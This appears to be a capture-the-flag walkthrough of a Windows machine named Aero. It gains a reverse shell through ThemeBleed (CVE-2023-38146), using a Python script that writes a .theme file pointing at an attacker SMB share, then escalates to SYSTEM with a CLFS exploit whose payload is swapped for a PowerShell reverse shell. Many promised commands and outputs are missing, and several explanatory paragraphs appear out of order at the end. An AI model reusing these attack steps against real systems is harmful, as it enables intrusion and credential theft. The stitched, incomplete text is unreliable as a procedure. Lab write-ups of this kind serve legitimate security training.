Aero
Let's start by enumerating ports using Nmap:
The scan result shows that only port 80 is open, served by Microsoft-IIS/10.0.
After entering the IP address of the machine in the browser, we get the following page:
The description on the webpage indicates that the website is intended to allow users to upload themes for the Windows 11 operating system:
Let's find an example .theme file (in our case aero.theme) and upload it to the webpage:
The file upload seems to be working fine. Attempts to upload a file with an extension other than .theme or .themepack fail:
Let's search the Internet for known vulnerabilities involving Windows theme files.
We do not know which version of Windows we are dealing with, but a Google search indicates that Microsoft-IIS/10.0 was introduced with Windows Server 2016 and Windows 10, so the operating system may also be Windows 11. Let's look for an exploit we can use against the vulnerability we found.
PoC
The code exploiting the vulnerability can be found in the following repository:
Let's download the release of this repository first. The ThemeBleed.zip file we downloaded contains the following files:
The README file indicates that ThemeBleed.exe can do three things: start the server, generate a .theme file referencing a given host, or generate a .themepack file referencing a given host. The data directory contains three binary files: stage_1, stage_2 and stage_3. To build our payload we have to create a DLL that exports a function named VerifyThemeVersion, and replace stage_3 with the library we created.
Let's open Visual Studio, select Create new project and then choose Dynamic-Link Library (DLL):
Let's name our solution stage_3. After creating the solution we should have the following files:
Let's add the rev_shell.cpp and rev_shell.h files to our project. After adding them, the project structure should look like this:
Let's include rev_shell.h in the pch.h file. The pch.h file after including the header looks like this:
Let's move on to the rev_shell.cpp file. First we need C++ code that gives us a reverse shell; in this case we will use the code from the following repository:
After adapting the code to our needs, rev_shell.cpp looks as follows:
The exploit from GitHub starts an SMB server on port 445, so before starting it we should check that this port is not already in use. On Windows the port is normally held by the Server (LanmanServer) service. We can check it with the following command:
To free port 445 we need to set the startup type of the Server Windows service to Disabled and reboot the Windows VM. After that we can prepare the malicious theme aero.theme with the following command:
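The two preparation steps above (checking that TCP/445 is free and producing a theme that points at the attacker host) as an added Python example; this is not ThemeBleed's own code, which is a compiled .exe, but it shows what the generated file has to contain. The attacker address 10.10.14.5 and the share/file names under \\10.10.14.5\share\ are placeholders assumed for the example; the real names are whatever ThemeBleed's server serves.

```python
"""Added example (not ThemeBleed's code): check that TCP/445 is free on the host
that will run the SMB server, and write a .theme file whose visual style path
points at an attacker-controlled UNC share.

Assumptions (not taken from the page): host 10.10.14.5 and the UNC path
\\10.10.14.5\share\aero.msstyles are placeholders.
"""
import configparser
import socket
from pathlib import Path


def port_in_use(port: int, host: str = "127.0.0.1", timeout: float = 0.5) -> bool:
    """Return True if something already listens on host:port (on Windows, 445 is
    usually held by the Server/LanmanServer service)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def build_theme(unc_path: str, display_name: str = "aero") -> str:
    """Build the INI text of a .theme file. [VisualStyles] Path is what Windows
    resolves when the theme is applied; pointing it at a UNC path makes the
    target fetch the .msstyles over SMB, which is the entry point of
    CVE-2023-38146 as described in the writeup."""
    if not unc_path.startswith("\\\\"):
        raise ValueError("expected a UNC path like \\\\host\\share\\file.msstyles")
    return (
        "[Theme]\r\n"
        f"DisplayName={display_name}\r\n"
        "\r\n"
        "[VisualStyles]\r\n"
        f"Path={unc_path}\r\n"
        "ColorStyle=NormalColor\r\n"
        "Size=NormalSize\r\n"
    )


def parse_theme_path(theme_text: str) -> str:
    """Read the Path entry back, so the file can be checked before uploading."""
    cfg = configparser.ConfigParser(interpolation=None)  # values may contain '%'
    cfg.read_string(theme_text)
    return cfg["VisualStyles"]["Path"]


if __name__ == "__main__":
    if port_in_use(445):
        print("TCP/445 is in use: disable the Server service and reboot before starting ThemeBleed")
    text = build_theme(r"\\10.10.14.5\share\aero.msstyles")
    Path("aero.theme").write_text(text)
    print("aero.theme references", parse_theme_path(text))
```

Running the script before starting the SMB server tells you immediately whether the Server service still owns the port; if it does, the Disabled startup type plus reboot from the text is what frees it.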
Let's start the server:
And let's run listener:
Now upload the prepared aero.theme file to the webpage:
In the console with the server running, we can see that the stage_3 library has been loaded:
Let's check if we managed to get the reverse shell:
Success! We received a reverse shell as the user sam.emerson:
The user flag can be obtained from C:\Users\sam.emerson\Desktop\user.txt.
In sam.emerson's Documents folder we find a PDF file whose name refers to a CVE:
The easiest way to get the CVE-2023-28252_Summary.pdf file out is to encode it as Base64 and decode it with CyberChef. Let's switch the console to PowerShell and encode the file with the following command:
Use CyberChef to decode it from Base64:
Now save the file as CVE-2023-28252_Summary.pdf. Let's check its contents:
Let's look for an exploit for this vulnerability:
Let's download the contents of the repository to the attacking virtual machine and open the solution in Visual Studio:
The solution contains a single .cpp file, clfs_eop.cpp. Let's analyze its code:
Now let's go to the directory containing the compiled executable clfs_eop.exe and run a Python HTTP server:
Let's move to the target machine and download clfs_eop.exe with the following command:
The file was downloaded:
Let's prepare the listener:
And let's execute clfs_eop.exe on the target machine:
In the listener, we received a connection:
Let's check which user we are:
The root flag can be obtained from C:\Users\Administrator\Desktop\root.txt.
According to Microsoft's documentation, Windows themes use the .theme or .themepack extension. Now let's move on to file transfers:
The search results lead us to CVE-2023-38146, which affects the Windows 11 operating system. The page on Microsoft's website shows that this vulnerability may lead to remote code execution. It is exploited by getting the target to load a Windows theme file that references an attacker-controlled SMB share.
We want to create a DLL with a payload that gives us a reverse shell. To build it we have to switch from the Linux VM to a Windows VM with Visual Studio installed. A walkthrough on creating your own DLL with Visual Studio can be found in Microsoft's documentation.
According to the exploit repository, we have to export a VerifyThemeVersion function from our DLL, so we add the export to rev_shell.h (with __declspec(dllexport); declare it extern "C" so the exported name is not C++-mangled and is found under exactly that name). Microsoft's documentation describes how to export functions from a DLL. After adding the export, rev_shell.h should look as follows:
The PDF file describes CVE-2023-28252, a vulnerability whose exploitation may lead to privilege escalation. The document also mentions a security patch released by Microsoft in April 2023; an Internet search confirms that the patch was released on April 11, 2023, and that Windows 11 may also be affected.
At the end of the file we can see that notepad.exe is executed if the privilege escalation succeeds. We want to change this payload so that it gives us a reverse shell as SYSTEM. In this case we use the PowerShell #3 (Base64) payload from the website. Don't forget to change the IP address and port number. Let's paste the reverse shell into the code in place of notepad.exe, and build the project in the Release configuration.